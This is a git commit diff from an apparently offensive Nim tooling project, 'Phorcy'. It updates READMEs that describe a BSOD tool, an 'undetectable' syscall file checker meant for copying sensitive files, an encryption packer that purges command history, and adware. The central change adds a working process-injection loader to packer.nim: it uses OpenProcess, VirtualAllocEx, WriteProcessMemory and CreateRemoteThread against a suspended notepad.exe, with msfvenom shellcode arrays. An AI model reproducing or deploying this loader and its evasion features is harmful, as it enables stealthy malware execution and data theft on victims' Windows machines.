[S] worked on nim. added changes to NIM docs.

2023-11-29 13:37:44 +01:00
parent e774316a70
commit 59512d7b64
6 changed files with 135 additions and 74 deletions
--- a/README.md
+++ b/README.md
@@ -3,13 +3,13 @@ Phorcy

 **Warning**
 > This Tool is for educational purposes only.
-
+Do not release.
 **Note**
-> Coding Languages: NIM; Python; Javascript.
-> Working Status: Unfinished
+> Programming languages: NIM; C++, Python; Javascript.
+> Status: Unfinished
 > Date finished: N/A
 > Title: Phorcy
 > Description: ...
-
-
-
+> Main developers: Synthetic; Cat ;Eline
+Contains numerous new tools in NIM (tested on v. 2.0.0 unless written otherwise) that implement very important features for a project like this.
+Last updated: 29th November 2023. Time: Morning in Europe.
--- a/elinethingz/README.md
+++ b/elinethingz/README.md
@@ -11,13 +11,9 @@ format:
 [seq[byte]](@[0x40,0x80]


-# mic_reg.nim
-
-[Broken]
-Checks if Windows OSD is enabled.

 # encfile.nim
-Has multiple functions to encrypt text and/or files (streams) with AES-256 derived using HMAC (SHA512_256). Max. password size 1024.
+Has multiple functions to encrypt text and/or files (streams) with AES-256 derived using HMAC (SHA512_256). Max. password size 1024 characters. Tested. Is suitable for sensitive data.
 Has a fingerprint/is detectable.
 # OFFENSIVEencfile.nim
 Very stripped-down encryption tool. Takes a stream and encrypts it (AES256 with HMAC SHA512_256). No max. password size.
@@ -28,4 +24,16 @@ Ideally a "packer"/loader for the main stage. Still very experimental and needs


 # bsod.nim
-Serves a BSOD to targets on Windows.
+Serves a BSOD to targets on Windows.
+
+# mic_reg.nim
+
+[Broken]
+Checks if Windows OSD is enabled.
+
+# checkfile.nim
+Basic program that uses direct syscalls to know if a file exists. Undetectable in normal conditions.
+Can be chained with other direct syscalls to copy sensitive files.
+
+# basicadware.nim
+Basic adware. At execution, shows a MessageBox with a title and content picked from a random (limited) pool.
--- a/elinethingz/security/packer/OFFENSIVEencfile.nim
+++ b/elinethingz/security/packer/OFFENSIVEencfile.nim
@@ -20,6 +20,8 @@
 # i.e ./offensiveencfile input output password
 # or maybe only get password interactively. hmm...

+# WARNING:
+#    This program purges command history on Windows. 

 import nimcrypto
 import std/sysrand
--- a/elinethingz/security/packer/packer.nim
+++ b/elinethingz/security/packer/packer.nim
@@ -7,70 +7,118 @@

 #   see https://github.com/byt3bl33d3r/OffensiveNim/blob/master/src/pop_bin.nim
 #   see https://github.com/byt3bl33d3r/OffensiveNim/blob/master/src/shellcode_bin.nim
-import os
-import system
-
-const
-  MEM_COMMIT = 0x1000
-  MEM_RESERVE = 0x2000
-  PAGE_EXECUTE_READWRITE = 0x40
-
-type
-    HANDLE* = int
-    HWND* = HANDLE
-    UINT* = int32
-    LPCSTR* = cstring
-
-proc MessageBox*(hWnd: HWND, lpText: LPCSTR, lpCaption: LPCSTR, uType: UINT): int32 
-  {.discardable, stdcall, dynlib: "user32", importc: "MessageBoxA".}
-
-MessageBox(0, "Hello, world !", "Nim is Powerful", 0)



-#    LPVOID VirtualAllocEx(
-#      [in]           HANDLE hProcess,
-#      [in, optional] LPVOID lpAddress, BUT IF NULL: automatically calculated
-#      [in]           SIZE_T dwSize,    is an int? size in bytes of memory region. "The size of the region of memory to allocate, in bytes."
-#      [in]           DWORD  flAllocationType,      see https://learn.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualallocex
-#      [in]           DWORD  flProtect
-#    );
+import winim/lean
+import osproc

-# proc NimVirtualAllocEx*(hWnd: HWND, lpAddress: pointer, dwSize: LPCSTR, uType: UINT): int32 
-#  {.discardable, stdcall, dynlib: "user32", importc: "VirtualAllocEx".}
+proc injectCreateRemoteThread[I, T](shellcode: array[I, T]): void =

+    # Under the hood, the startProcess function from Nim's osproc module is calling CreateProcess() :D
+    let tProcess = startProcess("notepad.exe") # notepad is in PATH. change with whatever the loader loaded.
+    tProcess.suspend() # That's handy!
+    defer: tProcess.close()

-# Declare the VirtualAlloc function from Windows API
-proc VirtualAlloc*(addr: pointer void, size: csize_t, allocType: cuint, protect: cuint): pointer cvoid {.importwinapi: "VirtualAlloc".}
+    echo "[*] Target Process: ", tProcess.processID

-# Declare a simple function that will be loaded into the allocated memory
-proc helloWorld() =
-  echo "Hello, World from allocated memory!"
+    let pHandle = OpenProcess(
+        PROCESS_ALL_ACCESS, 
+        false, 
+        cast[DWORD](tProcess.processID)
+    )
+    defer: CloseHandle(pHandle)

-# Main procedure
-proc main(): int =
-  # Calculate the size needed for the function
-  let codeSize = procSize(helloWorld)
+    echo "[*] pHandle: ", pHandle

-  # Allocate memory using VirtualAlloc
-  let allocatedMemory = VirtualAlloc(nil, codeSize, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE)
-  if allocatedMemory == nil:
-    echo "Failed to allocate memory."
-    return 1  # Return an error code
+    let rPtr = VirtualAllocEx(
+        pHandle,
+        NULL,
+        cast[SIZE_T](shellcode.len),
+        MEM_COMMIT,
+        PAGE_EXECUTE_READ_WRITE
+    )

-  # Copy the function code to the allocated memory
-  memcpy(allocatedMemory, addr(helloWorld), codeSize)
+    var bytesWritten: SIZE_T
+    let wSuccess = WriteProcessMemory(
+        pHandle, 
+        rPtr,
+        unsafeAddr shellcode,
+        cast[SIZE_T](shellcode.len),
+        addr bytesWritten
+    )

-  # Cast the allocated memory to a function pointer
-  let funcPointer: proc() {.cdecl.} = cast[proc()](allocatedMemory)
+    echo "[*] WriteProcessMemory: ", bool(wSuccess)
+    echo "    \\-- bytes written: ", bytesWritten
+    echo ""

-  # Execute the function in the allocated memory
-  funcPointer()
+    let tHandle = CreateRemoteThread(
+        pHandle, 
+        NULL,
+        0,
+        cast[LPTHREAD_START_ROUTINE](rPtr),
+        NULL, 
+        0, 
+        NULL
+    )
+    defer: CloseHandle(tHandle)

-  # Deallocate the memory (optional)
-  os.free(allocatedMemory)
+    echo "[*] tHandle: ", tHandle
+    echo "[+] Injected"

-  return 0  # Return 0 to indicate successful execution
+when defined(windows):

-when isMainModule:
-  main()
+    # https://github.com/nim-lang/Nim/wiki/Consts-defined-by-the-compiler
+    when defined(i386):
+        # ./msfvenom -p windows/messagebox -f csharp, then modified for Nim arrays
+        echo "[*] Running in x86 process"
+        var shellcode: array[272, byte] = [
+        byte 0xd9,0xeb,0x9b,0xd9,0x74,0x24,0xf4,0x31,0xd2,0xb2,0x77,0x31,0xc9,0x64,0x8b,
+        0x71,0x30,0x8b,0x76,0x0c,0x8b,0x76,0x1c,0x8b,0x46,0x08,0x8b,0x7e,0x20,0x8b,
+        0x36,0x38,0x4f,0x18,0x75,0xf3,0x59,0x01,0xd1,0xff,0xe1,0x60,0x8b,0x6c,0x24,
+        0x24,0x8b,0x45,0x3c,0x8b,0x54,0x28,0x78,0x01,0xea,0x8b,0x4a,0x18,0x8b,0x5a,
+        0x20,0x01,0xeb,0xe3,0x34,0x49,0x8b,0x34,0x8b,0x01,0xee,0x31,0xff,0x31,0xc0,
+        0xfc,0xac,0x84,0xc0,0x74,0x07,0xc1,0xcf,0x0d,0x01,0xc7,0xeb,0xf4,0x3b,0x7c,
+        0x24,0x28,0x75,0xe1,0x8b,0x5a,0x24,0x01,0xeb,0x66,0x8b,0x0c,0x4b,0x8b,0x5a,
+        0x1c,0x01,0xeb,0x8b,0x04,0x8b,0x01,0xe8,0x89,0x44,0x24,0x1c,0x61,0xc3,0xb2,
+        0x08,0x29,0xd4,0x89,0xe5,0x89,0xc2,0x68,0x8e,0x4e,0x0e,0xec,0x52,0xe8,0x9f,
+        0xff,0xff,0xff,0x89,0x45,0x04,0xbb,0x7e,0xd8,0xe2,0x73,0x87,0x1c,0x24,0x52,
+        0xe8,0x8e,0xff,0xff,0xff,0x89,0x45,0x08,0x68,0x6c,0x6c,0x20,0x41,0x68,0x33,
+        0x32,0x2e,0x64,0x68,0x75,0x73,0x65,0x72,0x30,0xdb,0x88,0x5c,0x24,0x0a,0x89,
+        0xe6,0x56,0xff,0x55,0x04,0x89,0xc2,0x50,0xbb,0xa8,0xa2,0x4d,0xbc,0x87,0x1c,
+        0x24,0x52,0xe8,0x5f,0xff,0xff,0xff,0x68,0x6f,0x78,0x58,0x20,0x68,0x61,0x67,
+        0x65,0x42,0x68,0x4d,0x65,0x73,0x73,0x31,0xdb,0x88,0x5c,0x24,0x0a,0x89,0xe3,
+        0x68,0x58,0x20,0x20,0x20,0x68,0x4d,0x53,0x46,0x21,0x68,0x72,0x6f,0x6d,0x20,
+        0x68,0x6f,0x2c,0x20,0x66,0x68,0x48,0x65,0x6c,0x6c,0x31,0xc9,0x88,0x4c,0x24,
+        0x10,0x89,0xe1,0x31,0xd2,0x52,0x53,0x51,0x52,0xff,0xd0,0x31,0xc0,0x50,0xff,
+        0x55,0x08]
+
+    elif defined(amd64):
+        # ./msfvenom -p windows/x64/messagebox -f csharp, then modified for Nim arrays
+        echo "[*] Running in x64 process"
+        var shellcode: array[295, byte] = [
+        byte 0xfc,0x48,0x81,0xe4,0xf0,0xff,0xff,0xff,0xe8,0xd0,0x00,0x00,0x00,0x41,0x51,
+        0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x3e,0x48,
+        0x8b,0x52,0x18,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x48,0x8b,0x72,0x50,0x3e,0x48,
+        0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,
+        0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x3e,
+        0x48,0x8b,0x52,0x20,0x3e,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x3e,0x8b,0x80,0x88,
+        0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x6f,0x48,0x01,0xd0,0x50,0x3e,0x8b,0x48,
+        0x18,0x3e,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x5c,0x48,0xff,0xc9,0x3e,
+        0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,
+        0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x3e,0x4c,0x03,0x4c,0x24,
+        0x08,0x45,0x39,0xd1,0x75,0xd6,0x58,0x3e,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,
+        0x66,0x3e,0x41,0x8b,0x0c,0x48,0x3e,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x3e,
+        0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,
+        0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,
+        0x59,0x5a,0x3e,0x48,0x8b,0x12,0xe9,0x49,0xff,0xff,0xff,0x5d,0x49,0xc7,0xc1,
+        0x00,0x00,0x00,0x00,0x3e,0x48,0x8d,0x95,0xfe,0x00,0x00,0x00,0x3e,0x4c,0x8d,
+        0x85,0x0f,0x01,0x00,0x00,0x48,0x31,0xc9,0x41,0xba,0x45,0x83,0x56,0x07,0xff,
+        0xd5,0x48,0x31,0xc9,0x41,0xba,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x48,0x65,0x6c,
+        0x6c,0x6f,0x2c,0x20,0x66,0x72,0x6f,0x6d,0x20,0x4d,0x53,0x46,0x21,0x00,0x4d,
+        0x65,0x73,0x73,0x61,0x67,0x65,0x42,0x6f,0x78,0x00]
+
+    # equivalent of 'if __name__ == '__main__' in python
+    # when isMainModule:
+    #    injectCreateRemoteThread(shellcode)
+injectCreateRemoteThread(shellcode)
--- a/elinethingz/utils/basicadware.nim
+++ b/elinethingz/utils/basicadware.nim
@@ -20,12 +20,14 @@ proc MessageBox*(hWnd: HWND, lpText: LPCSTR, lpCaption: LPCSTR, uType: UINT): in

 var
    titlemessages = @["Are you really free?",
-    "Window on the street, only mesmerized and pondering... Am I in the right?"]
-    captionmessages = @["From the river to the sea, Palestine will be free.",
-    "I believe and have faith in you."]
-
+    "Poland!"]
+    captionmessages = @["From the river to the sea, Palestine will be free.", "We are the people of Heaven.",
+    "War is peace. Slavery is freedom. Ignorance is strength.","Kurva mac!"] # todo: convert to cstrings
 randomize() # seeds randomizer 
-var 
-    randomtitle:string = sample(titlemessages)
-    randommessage:string = sample(captionmessages)

+var 
+    randomtitle:cstring = sample(titlemessages).cstring
+    randommessage:cstring = sample(captionmessages).cstring
+
+if isMainModule:
+    MessageBox(0, randomtitle, randommessage, 0)
--- a/elinethingz/utils/checkfile.nim
+++ b/elinethingz/utils/checkfile.nim
@@ -4,8 +4,9 @@ proc fileExists(filename: cstring): bool =
  result = GetFileAttributesA(filename) != INVALID_FILE_ATTRIBUTES

 const
-    filename = "C:\\path\\to\\your\\file.txt"
+    filename = "C:\\path\\to\\your\\file.txt" # double-\ because it's an escape character.
 if fileExists(filename):
-  echo "The file exists!"
+  echo "File exists."
 else:
-  echo "The file does not exist."
+  echo "File does not exist."
+